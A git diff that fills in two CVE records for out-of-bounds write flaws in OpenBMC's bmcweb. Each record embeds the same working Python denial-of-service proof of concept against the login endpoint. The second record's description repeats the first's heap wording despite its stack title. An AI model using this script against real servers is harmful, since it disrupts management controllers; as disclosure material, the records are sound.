diff --git a/2022/2xxx/CVE-2022-2809.json b/2022/2xxx/CVE-2022-2809.json index c9fa8929d57..732162362dc 100644 --- a/2022/2xxx/CVE-2022-2809.json +++ b/2022/2xxx/CVE-2022-2809.json @@ -1,18 +1,128 @@ { - "data_type": "CVE", - "data_format": "MITRE", - "data_version": "4.0", "CVE_data_meta": { + "ASSIGNER": "James.Mihm@Intel.com", + "DATE_PUBLIC": "2022-10-07T19:00:00.000Z", "ID": "CVE-2022-2809", - "ASSIGNER": "cve@mitre.org", - "STATE": "RESERVED" + "STATE": "RESERVED", + "TITLE": "Unauthenticated out of bounds heap write in bmcweb" }, + "affects": { + "vendor": { + "vendor_data": [ + { + "product": { + "product_data": [ + { + "product_name": "OpenBMC", + "version": { + "version_data": [ + { + "version_affected": ">=", + "version_name": "Release", + "version_value": "2.10" + }, + { + "version_affected": "<=", + "version_name": "Release", + "version_value": "2.12" + }, + { + "version_affected": "!>=", + "version_name": "Release", + "version_value": "2.13" + } + ] + } + } + ] + }, + "vendor_name": "OpenBMC Project" + } + ] + } + }, + "credit": [ + { + "lang": "eng", + "value": "Finder: Jakub Rozanski, Intel Corporation" + }, + { + "lang": "eng", + "value": "Remediation: Krzysztof Grobelny, Intel Corporation" + } + ], + "data_format": "MITRE", + "data_type": "CVE", + "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", - "value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided." + "value": "A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service.\n\nWhen fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS." } ] + }, + "exploit": [ + { + "lang": "eng", + "value": "import socket\nimport ssl\nimport time\n\nHOST = \"\" # PROVIDE HOSTNAME or IP ADDRESS OF TARGET BMCWEB\nPORT = 443\n\nlength = 322\nadditional = \"\"\n\npayload = \"\"\"POST /login HTTP/1.1\\r\\nHost: :8080\\r\\nUser-Agent: curl/7.58.0\\r\\nAccept: */*\\r\\nContent-Length: %s\\r\\nContent-Type: multipart/form-data; boundary=---------------------------d74496d66958873e\\r\\n\\r\\n-----------------------------d74496d66958873e\\r\\nt-DiPpcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccgccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc%s\\r\\n\\r\\n\"\"\"\n\nif __name__ == \"__main__\":\n\n while(True):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n client = ssl.wrap_socket(client, cert_reqs=ssl.CERT_NONE)\n\n client.connect((HOST, PORT))\n toSend = payload % (str(length), additional)\n print(toSend)\n client.send(toSend.encode('utf-8'))\n print(client.recv(4096))\n client.close()\n time.sleep(0.01)\n length += 1\n additional += \"a\"\n" + } + ], + "generator": { + "engine": "Vulnogram 0.0.9" + }, + "impact": { + "cvss": { + "attackComplexity": "LOW", + "attackVector": "NETWORK", + "availabilityImpact": "HIGH", + "baseScore": 8.2, + "baseSeverity": "HIGH", + "confidentialityImpact": "NONE", + "integrityImpact": "LOW", + "privilegesRequired": "NONE", + "scope": "UNCHANGED", + "userInteraction": "NONE", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", + "version": "3.1" + } + }, + "problemtype": { + "problemtype_data": [ + { + "description": [ + { + "lang": "eng", + "value": "CWE-229: Improper Handling of Values" + } + ] + }, + { + "description": [ + { + "lang": "eng", + "value": "CWE-122: Heap-based Buffer Overflow" + } + ] + } + ] + }, + "references": { + "reference_data": [ + { + "name": "https://github.com/openbmc/bmcweb", + "refsource": "CONFIRM", + "url": "https://github.com/openbmc/bmcweb" + } + ] + }, + "solution": [ + { + "lang": "eng", + "value": "https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56796" + } + ], + "source": { + "discovery": "INTERNAL" } } \ No newline at end of file diff --git a/2022/3xxx/CVE-2022-3409.json b/2022/3xxx/CVE-2022-3409.json index 74fbffa4e96..b3f9eb2b555 100644 --- a/2022/3xxx/CVE-2022-3409.json +++ b/2022/3xxx/CVE-2022-3409.json @@ -1,18 +1,128 @@ { - "data_type": "CVE", - "data_format": "MITRE", - "data_version": "4.0", "CVE_data_meta": { + "ASSIGNER": "James.Mihm@Intel.com", + "DATE_PUBLIC": "2022-10-07T19:00:00.000Z", "ID": "CVE-2022-3409", - "ASSIGNER": "cve@mitre.org", - "STATE": "RESERVED" + "STATE": "RESERVED", + "TITLE": "Unauthenticated out of bounds stack write in bmcweb" }, + "affects": { + "vendor": { + "vendor_data": [ + { + "product": { + "product_data": [ + { + "product_name": "OpenBMC", + "version": { + "version_data": [ + { + "version_affected": ">=", + "version_name": "Release", + "version_value": "2.10" + }, + { + "version_affected": "<=", + "version_name": "Release", + "version_value": "2.12" + }, + { + "version_affected": "!>=", + "version_name": "Release", + "version_value": "2.13" + } + ] + } + } + ] + }, + "vendor_name": "OpenBMC Project" + } + ] + } + }, + "credit": [ + { + "lang": "eng", + "value": "Finder: Jakub Rozanski, Intel Corporation" + }, + { + "lang": "eng", + "value": "Remediation: Krzysztof Grobelny, Intel Corporation" + } + ], + "data_format": "MITRE", + "data_type": "CVE", + "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", - "value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided." + "value": "A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service.\n\nThis vulnerability was identified during mitigation for CVE-2022-2809.\n \nWhen fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS. " } ] + }, + "exploit": [ + { + "lang": "eng", + "value": "import socket\nimport ssl\nimport time\n\nHOST = \"\" # PROVIDE HOSTNAME or IP ADDRESS OF TARGET BMCWEB\nPORT = 443\n\nlength = 322\nadditional = \"\"\n\npayload = \"\"\"POST /login HTTP/1.1\\r\\nHost: :8080\\r\\nUser-Agent: curl/7.58.0\\r\\nAccept: */*\\r\\nContent-Length: %s\\r\\nContent-Type: multipart/form-data; boundary=---------------------------d74496d66958873e\\r\\n\\r\\n-----------------------------d74496d66958873e\\r\\nt-DiPpcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccgccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc%s\\r\\n\\r\\n\"\"\"\n\nif __name__ == \"__main__\":\n\n while(True):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n client = ssl.wrap_socket(client, cert_reqs=ssl.CERT_NONE)\n\n client.connect((HOST, PORT))\n toSend = payload % (str(length), additional)\n print(toSend)\n client.send(toSend.encode('utf-8'))\n print(client.recv(4096))\n client.close()\n time.sleep(0.01)\n length += 1\n additional += \"a\"\n" + } + ], + "generator": { + "engine": "Vulnogram 0.0.9" + }, + "impact": { + "cvss": { + "attackComplexity": "LOW", + "attackVector": "NETWORK", + "availabilityImpact": "HIGH", + "baseScore": 8.2, + "baseSeverity": "HIGH", + "confidentialityImpact": "NONE", + "integrityImpact": "LOW", + "privilegesRequired": "NONE", + "scope": "UNCHANGED", + "userInteraction": "NONE", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", + "version": "3.1" + } + }, + "problemtype": { + "problemtype_data": [ + { + "description": [ + { + "lang": "eng", + "value": "CWE-121: Stack-based Buffer Overflow" + } + ] + }, + { + "description": [ + { + "lang": "eng", + "value": "CWE-229: Improper Handling of Values" + } + ] + } + ] + }, + "references": { + "reference_data": [ + { + "name": "https://github.com/openbmc/bmcweb", + "refsource": "CONFIRM", + "url": "https://github.com/openbmc/bmcweb" + } + ] + }, + "solution": [ + { + "lang": "eng", + "value": "https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56868" + } + ], + "source": { + "discovery": "INTERNAL" } } \ No newline at end of file